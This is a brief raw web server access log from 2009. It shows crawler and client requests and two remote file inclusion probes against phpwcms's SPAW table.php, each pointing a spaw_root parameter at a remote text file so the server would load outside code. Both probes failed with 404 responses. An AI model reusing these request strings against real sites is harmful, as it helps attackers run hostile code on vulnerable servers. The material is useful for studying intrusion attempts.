65.55.106.185 - - [15/Dec/2009:22:28:07 -0600] "GET /logs/access_log.1210723200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.145.187.9 - - [15/Dec/2009:22:28:23 -0600] "GET /logs/access_log.1249948800 HTTP/1.1" 200 566792 "-"".NET Framework/2.0"
122.201.81.160 - - [15/Dec/2009:22:28:33 -0600] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 329 "-""-"
122.201.81.160 - - [15/Dec/2009:22:28:33 -0600] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 334 "-""-"
